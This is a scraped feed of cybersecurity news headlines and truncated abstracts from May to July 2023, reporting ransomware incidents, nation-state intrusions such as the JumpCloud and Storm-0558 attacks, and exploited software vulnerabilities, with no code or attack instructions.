An analysis of the indicators of compromise (IoCs) associated with the JumpCloud hack has uncovered evidence pointing to the involvement of North Korean state-sponsored groups, in a style that's reminiscent of the supply chain attack targeting 3CX. The findings come from SentinelOne, which mapped out the infrastructure pertaining to the intrusion to uncover underlying patterns. It's worth noting that JumpCloud, last week, attributed the attack to an unnamed "sophisticated nation-state sponsored threat actor." "The North Korean threat actors demonstrate a high level of creativity and strategic awareness in their targeting strategies," SentinelOne security researcher Tom Hegel told The Hacker News. "The research findings reveal a successful and multifaceted approach employed by these actors to infiltrate developer environments." "They actively seek access to tools and networks that can serve as gateways to more extensive opportunitie...The Hacker News
July 19, 2023
DangerousPassword Attacks Targeting Developers’ Windows, macOS, and Linux Environments
Abstract
The targeted attack group DangerousPassword has been continuously attacking cryptocurrency exchange developers since June 2019, using malware that infects Windows, macOS, and Linux environments with Python and Node.js installed.Cyware
July 19, 2023
New Attack Campaign Enters the ‘FakeUpdates’ Arena to Deliver NetSupport RAT
Abstract
A new campaign called FakeSG, similar to SocGholish, is using hacked WordPress websites to distribute the NetSupport RAT and deliver additional payloads. FakeSG utilizes different layers of obfuscation and delivery techniques.Cyware
July 18, 2023
Pakistani Entities Targeted in Sophisticated Attack Deploying ShadowPad Malware
Abstract
An unidentified threat actor compromised an application used by multiple entities in Pakistan to deliver ShadowPad, a successor to the PlugX backdoor that's commonly associated with Chinese hacking crews. Targets included a Pakistan government entity, a public sector bank, and a telecommunications provider, according to Trend Micro. The infections took place between mid-February 2022 and September 2022. The cybersecurity company said the incident could be the result of a supply-chain attack, in which a legitimate piece of software used by targets of interest is trojanized to deploy malware capable of gathering sensitive information from compromised systems. The attack chain takes the form of a malicious installer for E-Office, an application developed by the National Information Technology Board (NITB) of Pakistan to help government departments go paperless. It's currently not clear how the backdoored E-Office installer was delivered to the targets. That said, there...The Hacker News
July 18, 2023
Hacking campaign targets sites using WordPress WooCommerce Payments Plugin
Abstract
Threat actors are actively exploiting a critical flaw, tracked as CVE-2023-28121, in the WooCommerce Payments WordPress plugin. Threat actors are actively exploiting a recently disclosed critical vulnerability, tracked as CVE-2023-28121 (CVSS score:...Security Affairs
July 18, 2023
JumpCloud revealed it was hit by a sophisticated attack by a nation-state actor
Abstract
Software firm JumpCloud announced it was the victim of a sophisticated cyber attack carried out by a nation-state actor. JumpCloud is a cloud-based directory service platform designed to manage user identities, devices, and applications in a seamless...Security Affairs
July 17, 2023
Hackers Target Pakistani Government, Bank, and Telecom Provider With China-Made Malware
Abstract
Cybersecurity firm Trend Micro identified three entities in Pakistan targeted by Shadowpad last year: an unnamed government agency, a state bank, and a telecommunications provider.Cyware
July 17, 2023
Hackers Target Reddit Alternative Lemmy via Zero-Day Vulnerability
Abstract
A few days ago, an attacker leveraged a cross-site scripting (XSS) vulnerability to deface pages on some popular instances, including Lemmy.world, the most popular instance, which has over 100,000 users.Cyware
July 14, 2023
TeamTNT’s Cloud Credential Stealing Campaign Now Targets Azure and Google Cloud
Abstract
A malicious actor has been linked to a cloud credential stealing campaign in June 2023 that's focused on Azure and Google Cloud Platform (GCP) services, marking the adversary's expansion in targeting beyond Amazon Web Services (AWS). The findings come from SentinelOne and Permiso, which said the "campaigns share similarity with tools attributed to the notorious TeamTNT cryptojacking crew," although it emphasized that "attribution remains challenging with script-based tools." They also overlap with an ongoing TeamTNT campaign disclosed by Aqua called Silentbob that leverages misconfigured cloud services to drop malware as part of what's said to be a testing effort, while also linking SCARLETEEL attacks to the threat actor, citing infrastructure commonalities. "TeamTNT is scanning for credentials across multiple cloud environments, including AWS, Azure, and GCP," Aqua noted. The attacks, which single out public-facing Docker instanc...The Hacker News
July 14, 2023
Norwegian Refugee Council hit by cyberattack
Abstract
The NRC said it immediately suspended the database to protect the data and prevent further attacks. They also launched an external forensic investigation to determine the scope and impact of the cyberattack.Cyware
July 13, 2023
Tampa Bay Zoo Targeted in Cyberattack by Apparent Offshoot of Royal Ransomware
Abstract
One of the U.S.’s most popular zoos has been hit with a cyberattack involving the theft of employee and vendor information, and a likely offshoot of the Royal ransomware gang is taking credit.Cyware
July 12, 2023
Microsoft Thwarts Chinese Cyber Attack Targeting Western European Governments
Abstract
Microsoft on Tuesday revealed that it repelled a cyber attack staged by a Chinese nation-state actor targeting two dozen organizations, some of which include government agencies, in a cyber espionage campaign designed to acquire confidential data. The attacks, which commenced on May 15, 2023, entailed access to email accounts affecting approximately 25 entities and a small number of related individual consumer accounts. The tech giant attributed the campaign to Storm-0558, describing it as a nation-state activity group based out of China that primarily singles out government agencies in Western Europe. "They focus on espionage, data theft, and credential access," Microsoft said. "They are also known to use custom malware that Microsoft tracks as Cigril and Bling, for credential access." The breach is said to have been detected a month later on June 16, 2023, after an unidentified customer reported the anomalous email activity to the company. Microsoft sai...The Hacker News
July 12, 2023
Microsoft mitigated an attack by Chinese threat actor Storm-0558
Abstract
Microsoft announced it has mitigated a cyber attack by a China-linked threat actor, tracked as Storm-0558, which targeted customer emails. Microsoft announced it has mitigated an attack conducted by a China-linked threat actor, tracked as Storm-0558,...Security Affairs
July 12, 2023
Unpatched Office zero-day CVE-2023-36884 actively exploited in targeted attacks
Abstract
Microsoft warned today that an unpatched zero-day in multiple Windows and Office products was actively exploited in the wild. Microsoft disclosed an unpatched zero-day vulnerability in multiple Windows and Office products that has been actively exploited...Security Affairs
July 11, 2023
Australian Infrastructure Company Ventia Hit With Cyberattack
Abstract
The Australian infrastructure services provider Ventia is dealing with a cyberattack that began this weekend. On Saturday, the company said it identified a cyber intrusion and took some “key systems” offline to contain the incident.Cyware
July 10, 2023
RomCom RAT attackers target groups supporting NATO membership of Ukraine
Abstract
Threat actors are targeting NATO and groups supporting Ukraine in a spear-phishing campaign distributing the RomCom RAT. On July 4, the BlackBerry Threat Research and Intelligence team uncovered a spear phishing campaign aimed at an organization...Security Affairs
July 10, 2023
RomCom RAT Targeting NATO and Ukraine Support Groups
Abstract
The threat actors behind the RomCom RAT have been suspected of phishing attacks targeting the upcoming NATO Summit in Vilnius as well as an identified organization supporting Ukraine abroad. The findings come from the BlackBerry Threat Research and Intelligence team, which found two malicious documents submitted from a Hungarian IP address on July 4, 2023. RomCom, also tracked under the names Tropical Scorpius, UNC2596, and Void Rabisu, was recently observed staging cyber attacks against politicians in Ukraine who are working closely with Western countries and a U.S.-based healthcare organization involved with aiding refugees fleeing the war-torn country. Attack chains mounted by the group are geopolitically motivated and have employed spear-phishing emails to point victims to cloned websites hosting trojanized versions of popular software. Targets include militaries, food supply chains, and IT companies. The latest lure documents identified by BlackBerry impersonate Ukrainia...The Hacker News
July 07, 2023
JumpCloud Resets API Keys Amid Ongoing Cybersecurity Incident
Abstract
JumpCloud, a provider of cloud-based identity and access management solutions, has swiftly reacted to an ongoing cybersecurity incident that impacted some of its clients. As part of its damage control efforts, JumpCloud has reset the application programming interface (API) keys of all customers affected by this event, aiming to protect their valuable data. The company has informed the concerned clients about the critical nature of this move, reinforcing its commitment to safeguarding their operations and organizations. This API key reset will, however, disrupt certain functionalities like AD import, HRIS integrations, JumpCloud PowerShell modules, JumpCloud Slack apps, Directory Insights Serverless apps, ADMU, third-party zero-touch MDM packages, Command Triggers, Okta SCIM integration, Azure AD SCIM integration, Workato, Aquera, Tray, and more. Despite the potential disruptions, JumpCloud maintains that the key reset is for the greater good of its clients. For those needing assis...The Hacker News
July 06, 2023
Silentbob Campaign: Cloud-Native Environments Under Attack
Abstract
Cybersecurity researchers have unearthed an attack infrastructure that's being used as part of a "potentially massive campaign" against cloud-native environments. "This infrastructure is in early stages of testing and deployment, and is mainly consistent of an aggressive cloud worm, designed to deploy on exposed JupyterLab and Docker APIs in order to deploy Tsunami malware, cloud credentials hijack, resource hijack, and further infestation of the worm," cloud security firm Aqua said. The activity, dubbed Silentbob in reference to an AnonDNS domain set up by the attacker, is said to be linked to the infamous cryptojacking group tracked as TeamTNT, citing overlaps in tactics, techniques, and procedures (TTPs). However, the involvement of an "advanced copycat" hasn't been ruled out. Aqua's investigation was prompted in the aftermath of an attack targeting its honeypot in early June 2023, leading to the discovery of four malicious cont...The Hacker News
July 5, 2023
European Entities Targeted in SmugX Campaign
Abstract
Check Point spotted a new campaign by a Chinese threat actor targeting diplomatic entities in Europe. Dubbed SmugX, the campaign uses HTML smuggling to deploy a new variant of PlugX RAT. The campaign reportedly overlaps with the activity of RedDelta and Mustang Panda. Organizations are advised to u...Cyware
July 5, 2023
The Port of Nagoya, the largest Japanese port, suffered a ransomware attack
Abstract
The Port of Nagoya, the largest port in Japan, suffered a ransomware attack that severely impacted its operations. The Port of Nagoya, in the Ise Bay, is the largest and busiest trading port in Japan, accounting for about 10% of the total trade value...Security Affairs
July 3, 2023
GCHQ reveals British government was hacked by foreign cyber spies 20 years ago
Abstract
This month marks the 20th anniversary of the first time cyber experts at GCHQ responded to a foreign state hacking the British government, the intelligence and security agency revealed on Friday.Cyware
July 3, 2023
Hacks targeting British exam boards raise fears of students cheating
Abstract
Police in Britain are investigating multiple incidents in which national exam papers for school-leavers were stolen by hackers and sold online to students seeking to cheat on their tests.Cyware
July 3, 2023
GuLoader Campaign Targets Law Firms in the US
Abstract
The GuLoader malware campaign utilizes a multi-stage infection chain, including a PDF lure, a GuLoader VBScript, and obfuscated PowerShell scripts, to deliver the Remcos RAT.Cyware
July 2, 2023
WordPress sites using the Ultimate Member plugin are under attack
Abstract
Threat actors are exploiting a critical WordPress zero-day in the Ultimate Member plugin to create secret admin accounts. Hackers are actively exploiting a critical unpatched WordPress Plugin flaw, tracked as CVE-2023-3460 (CVSS score: 9.8), to create...Security Affairs
June 29, 2023
8Base Ransomware Activity Spikes, Researchers Warn
Abstract
Ransomware threat 8Base has been conducting double extortion attacks for over a year and its activities spiked suddenly in May and June 2023. 8Base has been connected to 67 attacks by Malwarebytes and NCC Group. Approximately 50% of the targeted victims belong to the business services, manufacturin...Cyware
June 28, 2023
Using Electromagnetic Fault Injection Attacks to take over drones
Abstract
Electromagnetic fault injection (EMFI) attacks on drones can potentially allow attackers to achieve arbitrary code execution and take over them. While the use of drones continues to grow, researchers from IOActive analyzed how to develop fault injection...Security Affairs
June 27, 2023
New Ongoing Campaign Targets npm Ecosystem with Unique Execution Chain
Abstract
Cybersecurity researchers have discovered a new ongoing campaign aimed at the npm ecosystem that leverages a unique execution chain to deliver an unknown payload to targeted systems. "The packages in question seem to be published in pairs, each pair working in unison to fetch additional resources which are subsequently decoded and/or executed," software supply chain security firm Phylum said in a report released last week. To that end, the order in which the pair of packages are installed is paramount to pulling off a successful attack, as the first of the two modules is designed to store locally a token retrieved from a remote server. The campaign was first discovered on June 11, 2023. The second package subsequently passes this token as a parameter alongside the operating system type to an HTTP GET request to acquire a second script from the remote server. A successful execution returns a Base64-encoded string that is immediately executed but only if that string is...The Hacker News
June 27, 2023
Senior Choice, Inc. Provides Notice of Security Incident
Abstract
The company, which manages three residential facilities in Pennsylvania, discovered suspicious activity in its internal systems used for business operations and immediately implemented measures to contain the situation.Cyware
June 27, 2023
Schneider Electric and Siemens Energy are two more victims of a MOVEit attack
Abstract
Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including Schneider Electric and Siemens Energy. The Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial...Security Affairs
June 26, 2023
Japanese Cryptocurrency Exchange Falls Victim to JokerSpy macOS Backdoor Attack
Abstract
An unknown cryptocurrency exchange located in Japan was the target of a new attack earlier this month to deploy an Apple macOS backdoor called JokerSpy. Elastic Security Labs, which is monitoring the intrusion set under the name REF9134, said the attack led to the installation of Swiftbelt, a Swift-based enumeration tool inspired by an open-source utility called SeatBelt. JokerSpy was first documented by Bitdefender last week, describing it as a sophisticated toolkit designed to breach macOS machines. Very little is known about the threat actor behind the operation other than the fact that the attacks leverage a set of programs written in Python and Swift that come with capabilities to gather data and execute arbitrary commands on compromised hosts. A primary component of the toolkit is a self-signed multi-architecture binary known as xcc that's engineered to check for FullDiskAccess and ScreenRecording permissions. The file is signed as XProtectCheck, indicating an...The Hacker News
June 26, 2023
Energy company Suncor suffered a cyber attack and its company Petro-Canada reported problems at its gas stations in Canada
Abstract
The cyber attack suffered by Suncor Energy impacted payment operations at Petro-Canada gas stations in Canada. Suncor Energy is Canada's leading integrated energy company that provides oil sands development, production and upgrading, offshore oil and gas,...
Source: Security Affairs
June 26, 2023
Microsoft Warns of Widescale Credential Stealing Attacks by Russian Hackers
Abstract
Microsoft has disclosed that it's detected a spike in credential-stealing attacks conducted by the Russian state-affiliated hacker group known as Midnight Blizzard. The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat intelligence team said. Midnight Blizzard, formerly known as Nobelium, is also tracked under the monikers APT29, Cozy Bear, Iron Hemlock, and The Dukes. The group, which drew worldwide attention for the SolarWinds supply chain compromise in December 2020, has continued to rely on unseen tooling in its targeted attacks aimed at foreign ministries and diplomatic entities. It's a sign of how determined they are to keep their operations up and running despite being exposed, which makes them a particularly formidable actor in the espionage area. "These credential attacks us...
Source: The Hacker News
June 20, 2023
Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer
Abstract
A highly targeted cyber attack against an East Asian IT company involved the deployment of custom malware written in Golang called RDStealer. "The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News. Evidence gathered by the Romanian cybersecurity firm shows that the campaign started in early 2022. The target was an unspecified IT company located in East Asia. In the early phases, the operation relied on readily available remote access trojans like AsyncRAT and Cobalt Strike, before transitioning to bespoke malware in late 2021 or early 2022 in a bid to thwart detection. A primary evasion tactic concerns the use of Microsoft Windows folders that are likely to be excluded from scanning by security software (e.g., System32 and Program Files) to store the backdoor payloads. One of the sub-folders in question...
Source: The Hacker News
June 16, 2023
Oil and gas giant Shell is another victim of Clop ransomware attacks
Abstract
British multinational oil and gas company Shell has confirmed that it has suffered a ransomware attack conducted by the Clop group. Oil and gas giant Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign...
Source: Security Affairs
June 15, 2023
Barracuda ESG zero-day exploited by China-linked APT
Abstract
Experts linked the UNC4841 threat actor behind the attacks exploiting the recently patched Barracuda ESG zero-day to China. Mandiant researchers linked the threat actor UNC4841 behind the attacks that exploited the recently patched Barracuda ESG zero-day...
Source: Security Affairs
June 15, 2023
New Supply Chain Attack Exploits Abandoned S3 Buckets to Distribute Malicious Binaries
Abstract
In what's a new kind of software supply chain attack aimed at open source projects, it has emerged that threat actors could seize control of expired Amazon S3 buckets to serve rogue binaries without altering the modules themselves. "Malicious binaries steal the user IDs, passwords, local machine environment variables, and local host name, and then exfiltrate the stolen data to the hijacked bucket," Checkmarx researcher Guy Nachshon said. The attack was first observed in the case of an npm package called bignum, which, until version 0.13.0, relied on an Amazon S3 bucket to download pre-built binary versions of an addon named node-pre-gyp during installation. "These binaries were published on a now-expired S3 bucket which has since been claimed by a malicious third party which is now serving binaries containing malware that exfiltrates data from the user's computer," according to a GitHub advisory published on May 24, 2023. An unknown threat actor...
Source: The Hacker News
June 15, 2023
Microsoft Links Data Wiping Attacks on Ukraine to New Russian Threat Actor
Abstract
The computing giant dubbed the threat actor Cadet Blizzard and said it's distinct from other well-known Russian military intelligence hacking groups, such as Sandworm and APT28, which is also known as Fancy Bear.
Source: Cyware
June 14, 2023
Unveiling the Balada injector: a malware epidemic in WordPress
Abstract
Learn the shocking truth behind the Balada Injector campaign and find out how to protect your organization from this relentless viral invasion. A deadly cyber campaign has been working silently to undermine website security by exploiting popular WordPress...
Source: Security Affairs
June 14, 2023
New Research Shows Potential of Electromagnetic Fault Injection Attacks Against Drones
Abstract
New research shows the potential of electromagnetic fault injection (EMFI) attacks against unmanned aerial vehicles, with experts showing how drones that don't have any known vulnerabilities could be hacked.
Source: Cyware
June 13, 2023
Adversary-in-the-Middle Attack Campaign Hits Dozens of Global Organizations
Abstract
"Dozens" of organizations across the world have been targeted as part of a broad business email compromise (BEC) campaign that involved the use of adversary-in-the-middle (AitM) techniques to carry out the attacks. "Following a successful phishing attempt, the threat actor gained initial access to one of the victim employee's account and executed an 'adversary-in-the-middle' attack to bypass Office365 authentication and gain persistence access to that account," Sygnia researchers said in a report shared with The Hacker News. "Once gaining persistence, the threat actor exfiltrated data from the compromised account and used his access to spread the phishing attacks against other victim's employees along with several external targeted organizations." The findings come less than a week after Microsoft detailed a similar combination of an AitM phishing and a BEC attack aimed at banking and financial services organizations. BEC scam...
Source: The Hacker News
June 11, 2023
Pro-Ukraine Cyber Anarchy Squad claims the hack of the Russian telecom provider Infotel JSC
Abstract
Pro-Ukraine hackers Cyber Anarchy Squad claimed responsibility for the attack that hit Russian telecom provider Infotel JSC. Pro-Ukraine hacking group Cyber.Anarchy.Squad claimed responsibility for an attack on Russian telecom provider Infotel JSC....
Source: Security Affairs
June 9, 2023
University of Manchester Announces Cyber Incident, Says Data 'Likely' Copied
Abstract
The University of Manchester, one of the largest universities in the United Kingdom by enrollment, announced on Friday that it was the victim of a cyber incident and that the hackers had accessed and "likely" copied data.
Source: Cyware
June 8, 2023
Aix-Marseille, France's largest university, hit by cyberattack
Abstract
The institution's management described the attack as coming "from a foreign country" but said its security systems triggered an alert allowing them to take the network offline before "great damage" was caused.
Source: Cyware
June 08, 2023
Kimsuky Targets Think Tanks and News Media with Social Engineering Attacks
Abstract
The North Korean nation-state threat actor known as Kimsuky has been linked to a social engineering campaign targeting experts in North Korean affairs with the goal of stealing Google credentials and delivering reconnaissance malware. "Further, Kimsuky's objective extends to the theft of subscription credentials from NK News," cybersecurity firm SentinelOne said in a report shared with The Hacker News. "To achieve this, the group distributes emails that lure targeted individuals to log in on the malicious website nknews[.]pro, which masquerades as the authentic NK News site. The login form that is presented to the target is designed to capture entered credentials." NK News, established in 2011, is an American subscription-based news website that provides stories and analysis about North Korea. The disclosure comes days after U.S. and South Korean intelligence agencies issued an alert warning of Kimsuky's use of social engineering tactics to strik...
Source: The Hacker News
June 7, 2023
Ukraine Warns Against Cyberespionage Campaign Planting LonePage Malware on Targeted Systems
Abstract
Volodymyr Kondrashov, spokesperson for Ukraine's State Service of Special Communications and Information Protection, tweeted Tuesday that the campaign targets Microsoft Windows machines used by government agencies and media organizations.
Source: Cyware
June 6, 2023
Update: Augusta not in contact with ransomware group behind attack, mayor says
Abstract
In a statement on Friday, the office of Augusta Mayor Garnett Johnson said it has continued to work with the city's IT team and outside security specialists to address the cyberattack that started on May 21.
Source: Cyware
June 5, 2023
Australian cyber-op attacked ISIL with zero-click exploit
Abstract
The documentary, BREAKING the CODE: Cyber Secrets Revealed, reveals that the Australian Signals Directorate developed three payloads it could deploy to ISIL fighters' smartphones and PCs "without ISIL having to interact with the device in any way."
Source: Cyware
June 4, 2023
Void Rabisu Group Uses RomCom for Geopolitical Attacks
Abstract
Researchers shed light on the evolving objectives of the Void Rabisu hacking group as they uncovered a campaign that used a fake version of the Ukrainian army's Delta situational awareness website to lure targets into installing the RomCom backdoor. While their previous operations were centered on data...
Source: Cyware
June 4, 2023
Xplain hack impacted the Swiss cantonal police and Fedpol
Abstract
Several Swiss cantonal police, the army, customs and the Federal Office of Police (Fedpol) were impacted by the attack against IT firm Xplain. Swiss police launched an investigation into the cyber attack that hit the Bernese IT company...
Source: Security Affairs
June 3, 2023
Hackers Exploit Barracuda ESG Zero-Day Flaw to Backdoor Malware
Abstract
Barracuda has disclosed information about a recent attack campaign that exploits a zero-day vulnerability in its ESG appliances to deploy three different malware strains. CISA added the flaw to its KEV catalog last week, urging federal agencies to apply the patches by June 16.
Source: Cyware
June 2, 2023
New Horabot Campaign Targets Spanish-Speaking Users in the Americas
Abstract
Horabot enables the threat actor to control the victim's Outlook mailbox, exfiltrate contacts' email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim's mailbox.
Source: Cyware
June 1, 2023
BlackCat claims the hack of the Casepoint legal technology platform used by US agencies
Abstract
The BlackCat ransomware gang claims to have hacked the Casepoint legal technology platform used by US agencies, including the SEC and FBI. The cybersecurity researcher Dominic Alvieri first noticed that the BlackCat ransomware gang added the company Casepoint...
Source: Security Affairs
May 30, 2023
BrutePrint attack allows unlocking smartphones by brute-forcing fingerprints
Abstract
Researchers devised an attack technique, dubbed BrutePrint, that allows brute-forcing fingerprints on smartphones to bypass authentication. Researchers have devised an attack technique, dubbed BrutePrint, that allows brute-forcing fingerprints...
Source: Security Affairs
May 27, 2023
Update: Latitude Financial Attack Costs Company Up to $68.5 Million
Abstract
Latitude was able to process transactions during the incident, but "account originations and collections were closed or severely restricted." The company has since fully recovered, it says.
Source: Cyware
May 26, 2023
WinTapix Attack Campaign Targets Middle East Nations
Abstract
An unidentified threat actor group has been observed employing a malicious Windows kernel driver in targeted attacks, primarily focusing on the Middle East region. Fortinet security experts have dubbed the artifact WINTAPIX (WinTapix.sys). To stay protected, users are suggested to immediately im...
Source: Cyware
May 25, 2023
Alert: Brazilian Hackers Targeting Users of Over 30 Portuguese Banks
Abstract
A Brazilian threat actor is targeting more than 30 Portuguese financial institutions with information-stealing malware as part of a long-running campaign that commenced in 2021. "The attackers can steal credentials and exfiltrate users' data and personal information, which can be leveraged for malicious activities beyond financial gain," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a new report shared with The Hacker News. The cybersecurity firm, which began tracking "Operation Magalenha" earlier this year, said the intrusions culminate in the deployment of two variants of a backdoor called PeepingTitle so as to "maximize attack potency." The links to Brazil stem from the use of the Brazilian-Portuguese language within the detected artifacts as well as source code overlaps with another banking trojan known as Maxtrilha, which was first disclosed in September 2021. PeepingTitle, like Maxtrilha, is written in the Delphi...
Source: The Hacker News
May 24, 2023
Iranian Tortoiseshell Hackers Targeting Israeli Logistics Industry
Abstract
At least eight websites associated with shipping, logistics, and financial services companies in Israel were targeted as part of a watering hole attack. Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456. "The infected sites collect preliminary user information through a script," ClearSky said in a technical report published Tuesday. Most of the impacted websites have been stripped of the rogue code. Tortoiseshell is known to be active since at least July 2018, with early attacks targeting IT providers in Saudi Arabia. It has also been observed setting up fake hiring websites for U.S. military veterans in a bid to trick them into downloading remote access trojans. That said, this is not the first time Iranian activity clusters have set their sights on the Israeli shipping sector with wa...
Source: The Hacker News
May 24, 2023
Cyber Attacks Strike Ukraine's State Bodies in Espionage Operation
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks targeting state bodies in the country as part of an espionage campaign. The intrusion set, attributed to a threat actor tracked by the authority as UAC-0063 since 2021, leverages phishing lures to deploy a variety of malicious tools on infected systems. The origins of the hacking crew are presently unknown. In the attack chain described by the agency, the emails targeted an unspecified ministry and purported to be from the Embassy of Tajikistan in Ukraine. It's suspected that the messages were sent from a previously compromised mailbox. The emails come attached with a Microsoft Word document that, upon enabling macros, launches an encoded VBScript called HATVIBE, which is then used to drop additional malware. This includes a keylogger (LOGPIE), a Python-based backdoor capable of running commands sent from a remote server (CHERRYSPY), and a tool focused on exfiltrating files with specific e...
Source: The Hacker News
May 23, 2023
German arms manufacturer Rheinmetall suffered Black Basta ransomware attack
Abstract
The German automotive and arms manufacturer Rheinmetall announced it was the victim of a Black Basta ransomware attack that took place last month. Rheinmetall is a German automotive and arms manufacturer that is listed on the Frankfurt stock exchange....
Source: Security Affairs
May 23, 2023
Cyberespionage Campaign Targets Ukraine, Israel, India, Kazakhstan, and Other Nations
Abstract
Apart from targeting Ukrainian government entities, a threat actor identified by researchers as UAC-0063 "has also shown interest" in targeting Mongolia, Kazakhstan, Kyrgyzstan, Israel, and India, according to the report published on Monday.
Source: Cyware
May 21, 2023
PyPI Repository temporarily suspends user sign-ups and package uploads due to ongoing attacks
Abstract
The Python Package Index (PyPI) maintainers have temporarily disabled the sign-up and package upload processes due to an ongoing attack. The maintainers of Python Package Index (PyPI), the Python software repository, have temporarily disabled the sign...
Source: Security Affairs
May 20, 2023
Mustang Panda Hijacks TP-Link Routers of European Foreign Affairs Entities
Abstract
European foreign affairs organizations are being targeted by the Chinese state-sponsored Camaro Dragon hacking group with a custom malware variant. This group has been found infecting residential TP-Link routers with a specialized malware called Horse Shell. Attackers can execute arbitrary commands,...
Source: Cyware
May 19, 2023
February cyber incident will cost molten metal flow engineering firm Vesuvius £3.5 million
Abstract
Vesuvius, a leader in molten metal flow engineering and technology, revealed that the February cyber incident will cost it £3.5 million. Vesuvius is a global leader in molten metal flow engineering and technology; it employs more than 10,000 people...
Source: Security Affairs
May 19, 2023
Dole incurs $10.5M in direct costs from February ransomware attack
Abstract
About $4.8 million of those costs were related to continuing operations. The attack had a limited overall impact on its operations, with the main disruption occurring in its fresh vegetables and Chilean business.
Source: Cyware
May 18, 2023
Escalating China-Taiwan Tensions Fuel Alarming Surge in Cyber Attacks
Abstract
The rising geopolitical tensions between China and Taiwan in recent months have sparked a noticeable uptick in cyber attacks on the East Asian island country. "From malicious emails and URLs to malware, the strain between China's claim of Taiwan as part of its territory and Taiwan's maintained independence has evolved into a worrying surge in attacks," the Trellix Advanced Research Center said in a new report. The attacks, which have targeted a variety of sectors in the region, are mainly designed to deliver malware and steal sensitive information, the cybersecurity firm said, adding it detected a four-fold jump in the volume of malicious emails between April 7 and April 10, 2023. Some of the most impacted industry verticals during the four-day time period were networking, manufacturing, and logistics. What's more, the spike in malicious emails targeting Taiwan has been followed by a 15x increase in PlugX detections between April 10 and April 12, 2023,...
Source: The Hacker News
May 18, 2023
China-Taiwan Tensions Spark Surge in Cyberattacks on Taiwan
Abstract
Trellix has observed a surge in malicious emails targeted toward Taiwan, starting April 7 and continuing until April 10. The number of malicious emails during this time increased to over four times the usual amount.
Source: Cyware
May 17, 2023
Franklin County Public Schools Hit by Ransomware Attack
Abstract
According to a statement from schools Superintendent Bernice Cobbs, the decision was made to cancel classes Monday in the interest of on-campus security as the impact of the cyberattack was being reviewed.
Source: Cyware
May 15, 2023
Researchers Uncover Powerful Backdoor and Custom Implant in Year-Long Cyber Campaign
Abstract
Government, aviation, education, and telecom sectors located in South and Southeast Asia have come under the radar of a new hacking group as part of a highly-targeted campaign that commenced in mid-2022 and continued into the first quarter of 2023. Symantec, by Broadcom Software, is tracking the activity under its insect-themed moniker Lancefly, with the attacks making use of a "powerful" backdoor called Merdoor. Evidence gathered so far points to the custom implant being utilized as far back as 2018. The ultimate goal of the campaign, based on the tools and the victimology pattern, is assessed to be intelligence gathering. "The backdoor is used very selectively, appearing on just a handful of networks and a small number of machines over the years, with its use appearing to be highly targeted," Symantec said in an analysis shared with The Hacker News. "The attackers in this campaign also have access to an updated version of the ZXShell rootkit."
Source: The Hacker News
May 12, 2023
Tennessee, Georgia colleges respond to cyberattacks as school year wraps up
Abstract
Tennessee's Chattanooga State Community College has been responding to a cyberattack since Saturday, forcing the school to cancel classes on Monday and modify schedules for staff members. The school serves more than 11,000 students.
Source: Cyware
May 12, 2023
Bl00dy Ransomware Gang Strikes Education Sector with Critical PaperCut Vulnerability
Abstract
U.S. cybersecurity and intelligence agencies have warned of attacks carried out by a threat actor known as the Bl00dy Ransomware Gang that attempt to exploit vulnerable PaperCut servers against the education facilities sector in the country. The attacks took place in early May 2023, the Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) said in a joint cybersecurity advisory issued Thursday. "The Bl00dy Ransomware Gang gained access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed to the internet," the agencies said. "Ultimately, some of these operations led to data exfiltration and encryption of victim systems. The Bl00dy Ransomware Gang left ransom notes on victim systems demanding payment in exchange for decryption of encrypted files." CVE-2023-27350 is a now-patched critical security flaw affecting some versions of PaperCut MF a...
Source: The Hacker News
May 10, 2023
Cybersecurity firm Dragos shared details about a failed extortion attempt it suffered
Abstract
Industrial cybersecurity firm Dragos revealed that a ransomware group attempted to breach its infrastructure and extort it. Industrial cybersecurity firm Dragos revealed that on May 8, 2023, a known ransomware group attempted and failed to breach...
Source: Security Affairs
May 10, 2023
Smashing Pumpkins frontman paid ransom to a hacker who threatened to leak the band's songs
Abstract
The frontman of the American alternative rock band Smashing Pumpkins, Billy Corgan, has revealed he paid hackers who stole the band's songs. The frontman of the alternative rock band Smashing Pumpkins, Billy Corgan, revealed he paid a ransom after...
Source: Security Affairs
May 10, 2023
More Than 45,000 Affected by December Cyberattack on Metropolitan Opera
Abstract
The organization reported that the names, financial account information, tax identification numbers, Social Security numbers, payment card information, and driver's license numbers of 45,094 people were leaked during the cyberattack.
Source: Cyware
May 09, 2023
Microsoft Warns of State-Sponsored Attacks Exploiting Critical PaperCut Vulnerability
Abstract
Iranian nation-state groups have now joined financially motivated actors in actively exploiting a critical flaw in PaperCut print management software, Microsoft disclosed over the weekend. The tech giant's threat intelligence team said it observed both Mango Sandstorm (Mercury) and Mint Sandstorm (Phosphorus) weaponizing CVE-2023-27350 in their operations to achieve initial access. "This activity shows Mint Sandstorm's continued ability to rapidly incorporate [proof-of-concept] exploits into their operations," Microsoft said in a series of tweets. On the other hand, CVE-2023-27350 exploitation activity associated with Mango Sandstorm is said to be on the lower end of the spectrum, with the state-sponsored group "using tools from prior intrusions to connect to their C2 infrastructure." It's worth noting that Mango Sandstorm is linked to Iran's Ministry of Intelligence and Security (MOIS) and Mint Sandstorm is associated with the Islamic...
Source: The Hacker News
May 8, 2023
Cyberattack at Hong Kong healthcare group may have exposed 100,000 patients' data
Abstract
OT&P Healthcare CEO Robin Green on Monday said the cyberattack took place within the clinic's management and operating system. "That system holds both patient identity and medical records. We have no idea … how much data was taken," he said.
Source: Cyware
May 08, 2023
